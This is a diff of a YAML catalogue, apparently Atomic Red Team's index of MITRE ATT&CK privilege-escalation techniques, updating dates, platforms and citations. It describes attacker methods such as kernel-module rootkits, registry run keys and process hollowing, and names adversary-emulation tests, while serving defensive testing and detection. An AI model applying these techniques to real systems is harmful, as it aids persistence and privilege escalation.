+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -35764,12 +36084,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -35823,11 +36142,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -35914,9 +36232,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -35929,7 +36247,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests:
     - name: Reg Key Run
@@ -36363,7 +36680,7 @@ privilege-escalation:
         elevation_required: true
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -36399,16 +36716,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -36449,7 +36765,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: Admin Account Manipulate
@@ -36944,138 +37259,137 @@ privilege-escalation:
           commands first\"\n}\n"
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests:
     - name: Snake Malware Kernel Driver Comadmin
@@ -37138,7 +37452,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -37164,12 +37478,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -37247,9 +37559,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -37316,7 +37627,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -37390,11 +37700,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -37411,7 +37720,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -37421,7 +37729,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -37430,19 +37738,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -37490,11 +37796,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -37562,18 +37869,17 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests:
     - name: Process Hollowing using PowerShell
@@ -37701,7 +38007,7 @@ privilege-escalation:
           Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -37764,11 +38070,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -37821,8 +38126,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -37870,7 +38175,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests:
     - name: Persistence with Custom AutodialDLL
@@ -38086,73 +38390,7 @@ privilege-escalation:
         elevation_required: true
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
